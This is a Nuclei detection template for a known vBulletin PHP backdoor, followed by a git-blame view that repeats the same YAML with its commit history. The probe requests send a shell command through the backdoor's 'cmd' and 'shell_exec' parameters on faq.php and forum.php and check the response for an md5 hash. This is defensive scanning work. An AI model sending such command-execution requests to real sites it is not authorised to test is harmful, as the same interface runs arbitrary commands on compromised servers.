nuclei-templates/http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml

id: vbulletin-backdoor

info:
  name: vBulletin Backdoor - Detect
  author: MaStErCho
  severity: high
  reference:
    - https://github.com/OWASP/vbscan
    - https://blog.sucuri.net/2017/01/vbulletin-malware-hackers-compete-backdoor-control.html
  metadata:
    max-request: 31
  tags: backdoor,php,vbulletin,rce

flow: http(1) && http(2)

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        part: body
        words:
          - "content=\"vBulletin"
          - "id=\"vbulletin_css"
          - "clientscript/vbulletin"
          - "vBulletin_init"
        condition: or

  - method: GET
    path:
      - '{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{BaseURL}}/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'
      - '{{paths}}.{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum'
      - '{{paths}}.{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum'

    payloads:
      paths:
        - 'boards'
        - 'board'
        - 'forum'
        - 'forums'
        - 'vb'

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{md5(num)}}')"
          - "status_code == 200"
        condition: and
# digest: 4b0a004830460221008fae03721bc314289f2c2baf635511008168b9dff78d584656301f117b647ba9022100d4ef2e2329df1e7fc48757076cdb654deeadfe9ac181ebfe64113af0ef0fa4cb:922c64590222798bb761d5b6d8e72950
A festive templates 2023-12-31 16:09:36 +00:00			`id: vbulletin-backdoor`

			`info:`
			`name: vBulletin Backdoor - Detect`
			`author: MaStErCho`
			`severity: high`
			`reference:`
			`- https://github.com/OWASP/vbscan`
			`- https://blog.sucuri.net/2017/01/vbulletin-malware-hackers-compete-backdoor-control.html`
TemplateMan Update [Mon Jan 29 11:58:34 UTC 2024] :robot: 2024-01-29 11:58:34 +00:00			`metadata:`
			`max-request: 31`
A festive templates 2023-12-31 16:09:36 +00:00			`tags: backdoor,php,vbulletin,rce`
Update vbulletin-backdoor.yaml 2024-01-19 21:37:50 +00:00
			`flow: http(1) && http(2)`
A festive templates 2023-12-31 16:09:36 +00:00
Update vbulletin-backdoor.yaml 2024-01-24 08:06:38 +00:00			`variables:`
			`num: "999999999"`

A festive templates 2023-12-31 16:09:36 +00:00			`http:`
			`- method: GET`
			`path:`
Update vbulletin-backdoor.yaml 2024-01-19 21:37:50 +00:00			`- '{{BaseURL}}'`

			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "content=\"vBulletin"`
			`- "id=\"vbulletin_css"`
			`- "clientscript/vbulletin"`
			`- "vBulletin_init"`
			`condition: or`

			`- method: GET`
			`path:`
Update vbulletin-backdoor.yaml 2024-01-24 08:06:38 +00:00			`- '{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}\|md5sum'`
			`- '{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}\|md5sum'`
			`- '{{BaseURL}}/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}\|md5sum'`
			`- '{{BaseURL}}/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}\|md5sum'`
			`- '{{paths}}.{{BaseURL}}/faq.php?cmd=echo%20-n%20{{num}}\|md5sum'`
			`- '{{paths}}.{{BaseURL}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}\|md5sum'`
A festive templates 2023-12-31 16:09:36 +00:00
			`payloads:`
			`paths:`
			`- 'boards'`
			`- 'board'`
			`- 'forum'`
			`- 'forums'`
			`- 'vb'`

			`stop-at-first-match: true`
			`host-redirects: true`
			`max-redirects: 3`
			`matchers:`
Update vbulletin-backdoor.yaml 2024-01-19 21:37:50 +00:00			`- type: dsl`
			`dsl:`
Update vbulletin-backdoor.yaml 2024-01-24 08:06:38 +00:00			`- "contains(body, '{{md5(num)}}')"`
Update vbulletin-backdoor.yaml 2024-01-19 21:37:50 +00:00			`- "status_code == 200"`
A festive templates 2023-12-31 16:09:36 +00:00			`condition: and`
Auto Template Signing [Mon Jan 29 12:41:50 UTC 2024] :robot: 2024-01-29 12:41:50 +00:00			`# digest: 4b0a004830460221008fae03721bc314289f2c2baf635511008168b9dff78d584656301f117b647ba9022100d4ef2e2329df1e7fc48757076cdb654deeadfe9ac181ebfe64113af0ef0fa4cb:922c64590222798bb761d5b6d8e72950`